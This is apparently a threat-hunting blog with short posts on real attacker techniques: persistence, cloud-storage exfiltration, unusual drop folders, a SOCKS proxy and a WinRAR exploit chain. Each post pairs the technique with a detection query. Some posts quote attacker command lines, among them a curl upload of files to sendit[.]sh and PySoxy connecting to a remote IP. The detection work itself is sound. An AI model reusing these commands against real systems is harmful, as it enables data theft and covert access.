Know Your Adversary

Hello everyone! Today we'll talk about stealth and persistence in a compromised system, focusing on the following technique: Hidden Window (T1564.003) . I'm sure that searching for suspicious values in the Run registry key is part of your Threat Hunting routine. But sometimes attackers, while trying to stay hidden, actually help us detect malicious activity. For example, EtherRAT wrote to HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth the following value: "C:\Windows\System32\conhost.exe" --headless "C:\Users\Bruno\AppData\Local\Adobe\Components\e8b3\node-v18.17.0-win-x64\node.exe" "C:\Users\Bruno\AppData\Local\Adobe\Components\e8b3\97f04949151a3819.js" As you can see, the attackers used conhost.exe with the --headless parameter to hide the window. But how often would such a command chain be legitimately written to the Run key? Of course, almost never. That gives us another detection opportunity: event_type: ...

Hello everyone! To be honest, after nearly 400 posts, finding something interesting in public reports has become a bit more challenging. Nevertheless, it’s still possible, and today we’ll once again talk about Exfiltration to Cloud Storage (T1567.002) . This time, the post is sponsored by our partners at Akira , and the following excerpt from a report caught my attention: “Next, the threat actor used the Microsoft Edge browser to access Bing, and search for the term ‘eayupload’ before settling on Easyupload.io, a website that provides access to file uploads via drag-and-drop.” As you can see, the attackers used yet another cloud storage service to upload the data they had collected. Access to such services can be proactively blocked, or you can monitor for suspicious connections to them: event_type: "dnsreq" AND dns_rname: "easyupload.io" Attackers are increasingly relying on legitimate tools and services, so understanding exactly which ones they may use can become...

Hello everyone! In some cases threat actors use very interesting folders to drop malware and tools thay use - and it can be a great target for hunting! Let's look at an example. This time it's Cloud Atlas (Cloud Werewolf, Inception). If we look through the report, we can see that the adversary leveraged multiple interesting folders to store malicious files and tools, for example: C:\Windows\ime C:\Windows\System32\ime C:\Windows\pla C:\Windows\inf C:\Windows\migration C:\Windows\System32\timecontrolsvc C:\Windows\SKB C:\Windows\LiveKernelReports C:\Windows\branding As you can see, these folder are not very common for legitimate executables, so we can use this information to build our hunting query: event_type: "processcreatewin" AND proc_file_path: ("Windows\\ime" OR "Windows\\System32\\ime" OR "Windows\\pla" OR "Windows\\inf" OR "Windows\\migration" OR "Windows\\System32\\timecontrolsvc" OR "Windows\\S...

Hello everyone! Today we'll look at another tool delivered by threat actors via ClickFix . And this time it's a 10-year-old open-source Python SOCKS5 proxy - PySoxy . So, according to ReliaQuest report , the adversary leveraged interactive PowerShell access to download Python tooling to C:\ProgramData .  The following command was executed to run the tool: python.exe b64.pyc -ssl -remote_port 443 -remote_ip 167.99.158[.]97 The tool was identified as PySoxy. As you can see, there're a few interesting command line parameters we can use to build a hunting query, for example: event_type: "processcreatewin" AND cmdline: ("remote_port" AND "remote_ip")  See you soon!

Hello everyone! Today we’ll take a look at several procedures observed in relatively recent Gamaredon (Disastrous Werewolf, Primitive Bear, Armageddon, Shuckworm, Aqua Blizzard) campaigns . As before, the attackers used phishing emails for initial access. The emails contained archives exploiting the CVE-2025-8088 vulnerability in WinRAR. After successful exploitation, a malicious VBS file - for example, 1_13_4_1882_18.03.2026.vbs  - was copied into %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ . We can search for suspicious VBS file creation events in this folder: event_type: "filecreatewin" AND file_path: ("programs\\startup" AND *.vbs) Next, the VBS file downloads a malicious HTA file from Cloudflare Workers. For example, we can look for wscript.exe communications with the corresponding domains: event_type: "dnsreqwin" AND dns_rname: "workers.dev" AND proc_file_path: "wscript.exe" The HTA file is downloaded into the %TEMP...

Hello everyone! I really enjoy spotting various legitimate services that attackers abuse. Today we’ll look at another such example within the context of the Exfiltration to Cloud Storage technique (T1567.002) . According to this report, MuddyWater (Nebulous Werewolf, Seedworm, TEMP.Zagros, Static Kitten, Mercury, TA450, Cobalt Ulster, Earth Vetala, Mango Sandstorm, Boggy Serpens) abused the sendit[.]sh service for data exfiltration. The service allows uploading files up to 10 GB using the command line: curl.exe -F "file=@C:\Windows\Temp\<artifact>" hxxps://sendit[.]sh As with other similar services, you can look for suspicious communications with it - for example, outbound connections initiated by cURL: event_type: "dnsreqwin" AND dns_rname: "sendit.sh" AND proc_file_path: "curl.exe" See you soon!